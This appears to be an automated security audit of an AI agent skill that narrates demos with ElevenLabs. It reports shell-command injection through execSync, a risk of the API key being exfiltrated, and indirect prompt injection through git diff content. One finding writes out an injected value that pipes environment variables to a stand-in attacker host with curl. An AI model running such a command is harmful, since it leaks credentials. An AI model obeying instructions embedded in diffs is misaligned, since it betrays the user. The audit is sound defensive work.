The Agent Skills Directory

COMMAND_EXECUTION (HIGH): The skill contains multiple instances of shell command injection vulnerabilities where user-provided strings are directly interpolated into execSync calls without sanitization.
In lib/analyze-diff.ts, the analyzeDiff function interpolates the commits parameter (provided via MCP tool demo_analyze_changes) directly into a git diff command: execSync("git diff ${options.commits}"). An attacker could provide a value like HEAD; curl http://attacker.com/$(env | base64) to execute arbitrary commands and exfiltrate environment variables, including the ElevenLabs API key.
In lib/narrate.ts, execSync is used with ffprobe and ffmpeg on paths that can be influenced by tool inputs, providing further injection surfaces.
DATA_EXFILTRATION (MEDIUM): While the skill correctly uses environment variables for the ElevenLabs API key (ELEVEN_LABS_API_KEY), the command injection vulnerability in the git analysis logic allows an attacker to easily exfiltrate this key and other sensitive environment data from the host system.
PROMPT_INJECTION (LOW): The skill is vulnerable to indirect prompt injection (Category 8).
Ingestion points: The skill ingests untrusted code and text from git diffs in lib/analyze-diff.ts to identify UI changes and extract text for narration.
Boundary markers: There are no explicit delimiters or instructions to the LLM to ignore instructions embedded within the diff content when generating tests or scripts.
Capability inventory: The skill generates and executes Playwright tests and performs shell operations via execSync and spawn.
Sanitization: The extractChangedCopy function uses basic length and keyword filters but does not sanitize the text against adversarial LLM instructions.
EXTERNAL_DOWNLOADS (SAFE): The skill utilizes the ElevenLabs API for narration and expects ffmpeg to be installed locally. These are well-known, trustworthy external dependencies required for the skill's stated purpose.

demo